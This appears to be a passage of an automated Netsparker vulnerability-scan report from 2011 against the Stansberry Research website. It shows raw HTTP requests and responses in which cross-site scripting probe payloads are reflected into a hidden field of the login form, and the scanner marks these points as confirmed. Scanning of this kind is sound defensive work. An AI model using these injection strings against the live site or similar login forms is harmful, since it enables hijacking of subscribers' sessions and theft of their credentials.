document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/pub/digest/archive/2008/html/fda_essays/'"--></style></script><script>netsparker(0x002A72)</script>">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td width="189" align="left" valign="top" bgcolor="#FFFFFF">
<table width="183" border="0" align="left" cellpadding="1" cellspacing="0">
<tr align="left" valign="top">
<td colspan="2"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong><img src="/images/premium_sub_head.gif" alt="Premium Products" width="183" height="19"></strong></font></td>
</tr>
<tr align="left" valign="top">
<td width="2%">&nbsp;</td>
<td width="98%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/trw/index.asp">True Wealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/psi/index.asp">Stansberry's Investment Advisory</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/oil/index.asp">S&A Resource Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/btr/index.asp">Advanced Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/twp/index.asp">The 12% Letter</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/dil/index.asp">Phase 1 Investor</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/evi/index.asp">Extreme Value</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/shr/index.asp">S&A Short Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tin/index.asp">True Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rem/index.asp">Retirement Millionaire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rtr/index.asp">Retirement Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pst/index.asp">Penny Stock Specialist</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/jrt/index.asp">Junior Resource Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/gra/index.asp">S&A Grail Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tws/index.asp">True Wealth Systems</a></font></td>
</tr>

<tr align="left" valign="top">
<td width="2%"></td>
<td width="98%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/digest/index.asp">The S&A Digest</a></font></td>
</tr>

<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="1"></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.dailywealth.com" target="new window">DailyWealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.growthstockwire.com" target="new window">Growth Stock Wire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.thedailycrux.com" target="new window">The Daily Crux</a></font></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="10"></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><strong><img src="/images/lifetime_sub_head.gif" alt="Lifetime Memberships" width="183" height="19"></strong></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pal/index.asp">The S&A Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pwa/index.asp">Private Wealth Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
</table>

</td>
<TD WIDTH="1" BGCOLOR="#cccccc"><IMG SRC="1-1.gif" WIDTH="1"
HEIGHT="1"></TD>
<td width="9" align="left" valign="top" bgcolor="#FFFFFF"> <div align="left">
</div></td>
<td width="417" align="left" valign="top" bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="2">
<tr>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><img src="/images/gld_title_sm.gif" alt="S&A Gold Report" width="370" height="34"></font></td>
</tr>
<tr>
<td align="left" valign="top"><p><font size="2"><em><font face="Verdana, Arial, Helvetica, sans-serif">S&amp;A Prospector </font></em><font face="Verdana, Arial, Helvetica, sans-serif">is a sophisticated research service in which exper..
- /responses/sign_in_error.asp

/responses/sign_in_error.asp CONFIRMED

Injection URL

http://www.stansberryresearch.com/responses/sign_in_error.asp

Injection Request

GET /responses/sign_in_error.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/secure/index.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=NAAOLMLBLNGANOMPFHFCPBJD; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=JBGBMFABGMENIJJFEHDGGCDG; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d000000000000c55c000000000000
Accept-Encoding: gzip, deflate

Identification Request

GET /responses/sign_in_error.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/ICA/default.aspx
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=NAAOLMLBLNGANOMPFHFCPBJD; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=JBGBMFABGMENIJJFEHDGGCDG; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d000000000000c55c000000000000
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:48:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 12152
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Stansberry & Associates Investment Research</title>
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/cover";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/secure/index/nsextt=%20netsparker(0x003B13)%20">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>

<div align="center">
<P align=center class="mid_font"><B>Please Log In </B></P>
<table width="42%" border="0" cellspacing="0" cellpadding="2">
<tr align="left" valign="top">
<td><u><span class="mid_font"><FONT color=#990000><FONT
color=#666666><font color="#000000"><B>Remember:</B></font></FONT></FONT></span></u></td>
</tr>

</table>
<P align=center class="mid_font">You must have an S&amp;A subscription to access this section. <BR>
To learn more about our publications, visit our <a href="/">home page</a>. </P>
<P align=center class="mid_font">If you are already a subscriber, check your user name and password and try logging in again. <br>
Or contact customer service at 1-888-261-2693.<font color="#FF0000"><strong> </strong></font></P>
<P align=center class="mid_font">Thank you.</P>
<P align=center class="mid_font"><FONT color=#990000><B><FONT
color=#666666><BR>
</FONT></B></FONT></P>
</div>

</td>
</tr>
</table>
<TABLE cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2><img src="/images/bottom_border.gif" width="798" height="24"></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td align="left" valign="top"><font color="#666666" size="1" face="Verdana, Arial, Helvetica, sans-serif">&copy;2011 Stansberry & Associates Investment Research. All Rights Reserved. Protected by copyright laws of the United States and international treaties. This website may only be used pursuant to the subscription agreement and any reproduction, copying, or redistribution (electronic or otherwise, including on the world wide web), in whole or in part, is strictly prohibited without the express written permission of Stansberry & Associates Investment Research, LLC. 1217 Saint Paul Street, Baltimore MD 21202. </font> </td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr width="800" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center">
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/">Home</a> | <a href="/editors.asp">Meet the Editors</a> | <a href="/news.asp">News & Events</a> | <a href="http://www.stansberryresearch.com/pub/psi/free_reports.html" target="_blank">Media &amp; Interviews</a> | <a href="/schedule.asp">Publishing Schedule</a> | <a href="/contact.asp">Contact Us</a> | <a href="/customer_service.asp">Customer Service</a><a href="/privacy.asp"><br>
</a> <a href="/pub/pal">The S&A Alliance</a> | <a href="/pub/sug">True Wealth Alliance</a> | <a href="/pub/pwa">Private Wealth Alliance</a> <br>
<a href="/pub/digest/">S&amp;A Digest</a> | <a href="http://www.dailywealth.com" target="_blank" title="DailyWealth Investment Newsletter">DailyWealth</a> | <a href="http://www.growthstockwire.com" target="_blank" title="Growth Stock Wire Investment Newsletter">Growth Stock Wire</a> | <a href="http://www.thedailycrux.com/" target="_blank">The Daily Crux<br />
</a></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/privacy.asp">Privacy Policy</a><br>
</font></p>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr align="center" width="300" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td height="21" align="left" valign="top"><div align="center"><a href="/"><strong><img src="/images/sa_logo.gif" alt="Stansberry & Associates Investment Research" width="198" height="39" border="0"></strong></a></div></td>
</tr>
</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-235360-4");
pageTracker._initData();
pageTracker._trackPageview();
</script>

<!-- Google Code for S&amp;A Remarketing List -->
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1068007774;
var google_conversion_language = "en";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "AVdACPaJ0QEQ3oKi_QM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1068007774/?label=AVdACPaJ0QEQ3oKi_QM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>
<!-- Advertiser 'Stansberry & Associates', Include user in segment '2011 DWP - Stansberry Retargeting Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ads.bluelithium.com/pixel?id=1539896&t=2" width="1" height="1" />
<!-- End of segment tag -->
</body>
</html>

Identification Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:48:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 12178
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Stansberry & Associates Investment Research</title>
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/cover";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/secure/index/'"--></style></script><script>netsparker(0x003B57)</script>">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>

<div align="center">
<P align=center class="mid_font"><B>Please Log In </B></P>
<table width="42%" border="0" cellspacing="0" cellpadding="2">
<tr align="left" valign="top">
<td><u><span class="mid_font"><FONT color=#990000><FONT
color=#666666><font color="#000000"><B>Remember:</B></font></FONT></FONT></span></u></td>
</tr>

</table>
<P align=center class="mid_font">You must have an S&amp;A subscription to access this section. <BR>
To learn more about our publications, visit our <a href="/">home page</a>. </P>
<P align=center class="mid_font">If you are already a subscriber, check your user name and password and try logging in again. <br>
Or contact customer service at 1-888-261-2693.<font color="#FF0000"><strong> </strong></font></P>
<P align=center class="mid_font">Thank you.</P>
<P align=center class="mid_font"><FONT color=#990000><B><FONT
color=#666666><BR>
</FONT></B></FONT></P>
</div>

</td>
</tr>
</table>
<TABLE cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2><img src="/images/bottom_border.gif" width="798" height="24"></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td align="left" valign="top"><font color="#666666" size="1" face="Verdana, Arial, Helvetica, sans-serif">&copy;2011 Stansberry & Associates Investment Research. All Rights Reserved. Protected by copyright laws of the United States and international treaties. This website may only be used pursuant to the subscription agreement and any reproduction, copying, or redistribution (electronic or otherwise, including on the world wide web), in whole or in part, is strictly prohibited without the express written permission of Stansberry & Associates Investment Research, LLC. 1217 Saint Paul Street, Baltimore MD 21202. </font> </td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr width="800" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center">
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/">Home</a> | <a href="/editors.asp">Meet the Editors</a> | <a href="/news.asp">News & Events</a> | <a href="http://www.stansberryresearch.com/pub/psi/free_reports.html" target="_blank">Media &amp; Interviews</a> | <a href="/schedule.asp">Publishing Schedule</a> | <a href="/contact.asp">Contact Us</a> | <a href="/customer_service.asp">Customer Service</a><a href="/privacy.asp"><br>
</a> <a href="/pub/pal">The S&A Alliance</a> | <a href="/pub/sug">True Wealth Alliance</a> | <a href="/pub/pwa">Private Wealth Alliance</a> <br>
<a href="/pub/digest/">S&amp;A Digest</a> | <a href="http://www.dailywealth.com" target="_blank" title="DailyWealth Investment Newsletter">DailyWealth</a> | <a href="http://www.growthstockwire.com" target="_blank" title="Growth Stock Wire Investment Newsletter">Growth Stock Wire</a> | <a href="http://www.thedailycrux.com/" target="_blank">The Daily Crux<br />
</a></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/privacy.asp">Privacy Policy</a><br>
</font></p>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr align="center" width="300" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td height="21" align="left" valign="top"><div align="center"><a href="/"><strong><img src="/images/sa_logo.gif" alt="Stansberry & Associates Investment Research" width="198" height="39" border="0"></strong></a></div></td>
</tr>
</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-235360-4");
pageTracker._initData();
pageTracker._trackPageview();
</script>

<!-- Google Code for S&amp;A Remarketing List -->
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1068007774;
var google_conversion_language = "en";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "AVdACPaJ0QEQ3oKi_QM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1068007774/?label=AVdACPaJ0QEQ3oKi_QM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>
<!-- Advertiser 'Stansberry & Associates', Include user in segment '2011 DWP - Stansberry Retargeting Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ads.bluelithium.com/pixel?id=1539896&t=2" width="1" height="1" />
<!-- End of segment tag -->
</body>
</html>
- /pub/pwa/

/pub/pwa/ CONFIRMED

Injection URL

http://www.stansberryresearch.com/responses/sign_in_error.asp

Injection Request

GET /responses/sign_in_error.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/secure/index.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
